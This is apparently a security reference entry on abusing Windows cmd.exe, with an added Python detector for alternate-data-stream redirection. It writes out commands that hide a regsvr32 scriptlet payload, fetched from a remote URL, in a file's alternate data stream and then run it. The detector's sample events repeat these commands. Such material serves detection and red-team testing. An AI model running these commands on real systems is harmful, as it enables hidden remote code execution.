03 : /Privilege-escalation Windows#

~/ cat Cmd.exe.md

The command-line interpreter in Windows

Paths:

C:\Windows\System32\cmd.exe
C:\Windows\SysWOW64\cmd.exe

Detection: cmd.exe executing files from alternate data streams.

Alternate data streams

Add content to an Alternate Data Stream (ADS).

cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat

Execute payload.bat stored in an Alternate Data Stream (ADS).

cmd.exe - < fakefile.doc:payload.bat
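
One way to implement the detection above, added here as an example (not code from the original page): it scans process-creation events for cmd.exe command lines that redirect output into, or read stdin from, a `file:stream` path. The field names `Image` and `CommandLine` assume Sysmon Event ID 1 style records, and the sample events, including the placeholder URL, are constructed.

```python
import re

# Redirect operator followed by a path ending in "name:stream". The optional
# drive prefix (C:\) is consumed first so its colon is not read as a stream
# separator; URLs fail because "/" cannot start a stream name.
ADS_REDIRECT = re.compile(
    r'(?P<op>[<>])\s*"?(?P<path>(?:[A-Za-z]:[\\/])?[^\s"<>|:]+:[^\s"<>|:\\/]+)'
)
ACTIONS = {">": "write-to-stream", "<": "execute-from-stream"}


def classify(event):
    """Return (action, path) findings for one process-creation event."""
    image = event.get("Image", "").replace("/", "\\").lower()
    if image.rsplit("\\", 1)[-1] != "cmd.exe":
        return []  # this rule only covers cmd.exe, as on the page
    return [(ACTIONS[m["op"]], m["path"])
            for m in ADS_REDIRECT.finditer(event.get("CommandLine", ""))]


def scan(events):
    """Return (event index, action, path) for every finding."""
    return [(i, action, path)
            for i, ev in enumerate(events)
            for action, path in classify(ev)]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c echo regsvr32.exe ^/s ^/u "
                    r"^/i:https://example.invalid/x.sct ^scrobj.dll "
                    r"> fakefile.doc:payload.bat"},
    {"Image": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r"cmd.exe - < fakefile.doc:payload.bat"},
    {"Image": r"C:\Windows\System32\cmd.exe",  # benign: plain file, 2>&1
     "CommandLine": r"cmd.exe /c dir > C:\Temp\out.txt 2>&1"},
    {"Image": r"C:\Windows\System32\cmd.exe",  # quoted path with drive letter
     "CommandLine": r'cmd.exe /c type notes.txt > "C:\Temp\report.doc:hidden.txt"'},
]

if __name__ == "__main__":
    for idx, action, path in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {action} -> {path}")
```

The regex only inspects redirection operators, so ADS paths passed as plain arguments or hidden behind caret-escaped operators need a separate rule.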